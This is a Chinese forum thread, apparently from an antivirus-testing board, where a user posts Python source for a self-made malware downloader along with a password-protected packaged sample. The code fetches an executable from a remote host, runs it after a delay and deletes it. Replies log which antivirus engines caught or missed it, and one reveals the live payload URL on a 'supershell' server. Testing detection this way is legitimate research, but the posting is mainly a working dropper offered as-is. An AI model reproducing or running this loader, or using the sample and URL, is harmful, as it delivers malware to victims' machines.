自制远程加载-python

显示全部楼层 · 发表于 2023-9-25 11:13:33

import requests
import subprocess
import time
# 远程Shellcode文件的URL
remote_shellcode_url = "http://xxxx.com/1.exe"
def load_and_execute_shellcode():
# 下载远程Shellcode文件
response = requests.get(remote_shellcode_url)
if response.status_code == 200:
# 将下载的内容保存为本地临时文件
with open("temp.exe", "wb") as f:
f.write(response.content)
# 延迟启动时间（单位为秒）
delay = 5
# 延迟启动
time.sleep(delay)
# 在内存中执行Shellcode文件
subprocess.call(["temp.exe"])
# 删除临时文件
subprocess.call("del temp.exe")
else:
print("无法下载远程Shellcode文件")
# 调用加载器函数
load_and_execute_shellcode()

复制代码

以上是源码内容

打包后的样本：https://wwcu.lanzouj.com/i7xHT19ug9kb
密码:5hup

显示全部楼层 · 发表于 2023-9-25 11:20:31

本帖最后由装甲未被击穿于 2023-9-25 17:10 编辑

AVAST MISS 已发送--------------------------
更新：已拉黑

显示全部楼层 · 发表于 2023-9-25 11:28:48

本帖最后由 swizzer 于 2023-9-25 12:02 编辑

与其说是Loader不如说是Downloader...

显示全部楼层 · 发表于 2023-9-25 11:30:05

类型:木马-HEUR/QVM202.0.3709.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云特征引擎
文件路径:D:\下载\8\8.exe
文件大小:10.11M (10,599,208 字节)
文件指纹（MD5）:c068bebd474faa6821857298f3d26eb2
处理建议:隔离文件

显示全部楼层 · 发表于 2023-9-25 11:31:47

实机双击WD无提示，毛豆直接入沙，运行失败

显示全部楼层 · 发表于 2023-9-25 11:49:00

BEST

HyperDetect 机器学习检测到威胁. 访问该网站被拒绝。118.89.125.171:8888/supershell/server/files/download/1.exe 包含类型为 Gen:Illusion.Mustang.5.2020100 的恶意软件

复制代码

显示全部楼层 · 发表于 2023-9-25 11:51:44

火绒
扫描：MISS

显示全部楼层 · 发表于 2023-9-25 11:54:02

本帖最后由初心．杰于 2023-9-25 19:38 编辑

趋势 miss 诺顿 kill

显示全部楼层 · 发表于 2023-9-25 11:54:42

装甲未被击穿发表于 2023-9-25 11:20
AVAST MISS 已发送

AVAST 哪里能提交样本啊

显示全部楼层 · 发表于 2023-9-25 12:00:23

初心．杰发表于 2023-9-25 11:54
AVAST 哪里能提交样本啊

可以网页上报，https://www.avast.com/false-positive-file-form.php#pc
也可把样本手动加进隔离区，然后右键，选择发送到实验室

[病毒样本] 自制远程加载-python

本帖子中包含更多资源

评分

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源